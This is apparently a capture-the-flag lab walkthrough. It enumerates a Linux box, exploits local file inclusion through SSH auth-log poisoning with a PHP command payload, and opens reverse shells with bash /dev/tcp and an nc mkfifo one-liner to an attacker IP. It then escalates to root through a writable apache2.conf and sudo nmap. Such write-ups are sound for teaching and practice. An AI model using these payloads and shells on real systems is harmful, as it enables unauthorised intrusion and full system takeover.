Enumeration
Machine IP → 192.168.51.80
Network Scan
Nmap scan → nmap -sC -sV -Pn -p- -A -o nmap.txt 192.168.51.80
OS Detection → OS: Linux; CPE: cpe:/o:linux:linux_kernel
Table
| Port | Service | Other details (if any) |
|---|---|---|
| 22 | SSH | OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) |
| 80 | HTTP | Apache httpd 2.4.29 (Ubuntu) |
Web Scan
GoBuster scan → gobuster dir -u http://192.168.51.80 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php
Directories/files listed →
- images/
- index.html
- console/
The console/ directory has a php file present in it called file.php.
Exploitation
LFI
Running the file.php file does not give any output. As a good practice checking for LFI using ?file=../../../../../etc/passwd works out and LFI is possible. There is an ssh service on the machine, therefore, checked log files. The auth log file at /var/log/auth.log contains the ssh logs.
Transition LFI to SSH Log Poisoning
Given the presence of SSH logs, poisoning is tested by using payload → ssh "<?php system(\$_GET['cmd']);?>"@<192.168.125.80>. A failed login attempt gets logged and the php code is inserted. LFI can now be used to execute the php in the log file, with the addition of the cmd parameter like so → ..console/file.php?file=/var/log/auth.log&cmd=id. This returned the id of the www-data user in the response i.e., RCE.
User shell
Using the RCE, a shell can be spawned by using bash payload → bash -i >& /dev/tcp/192.168.49.208/3002 0>&1 to get a reverse shell. This can be done via burp to URL encode and send the payload. There was no bash in the system, therefore reverting to nc and /bin/sh combo → rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.208 3002 >/tmp/f.
This gives a www-data user shell via netcat.
Privilege Escalation
Escalated User
With the www-data shell, the linenum script can be run (example → linenum script). This gives the files which are writable by the current user. One such file is the apache2.conf file which can be modified to ensure execution of the web server as a privileged user by editing the User and Group to be mahakal, a user detected by looking at the /etc/passwd file.
Next, a pentest monkey php reverse shell is plugged into the serving directory for navigation to it. This can be named exploit.php. The server needs to be restarted for the new settings to be applied. Therefore, as revealed using sudo -l, the server can be restarted as super user without the need of a password using the systemctl command as the www-data user.
After it is restarted, a listener can be used to receive shell as the user mahakal.
Root
As the user mahakal, the binary that can be run as as a super user without a password as revealed by sudo -l is actually nmap.
Nmap can be used to launch an interactive interpreter using →
1
2
3
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
nmap --script=$TF
Thus, the shell received is actually that of root. This gives the root flag.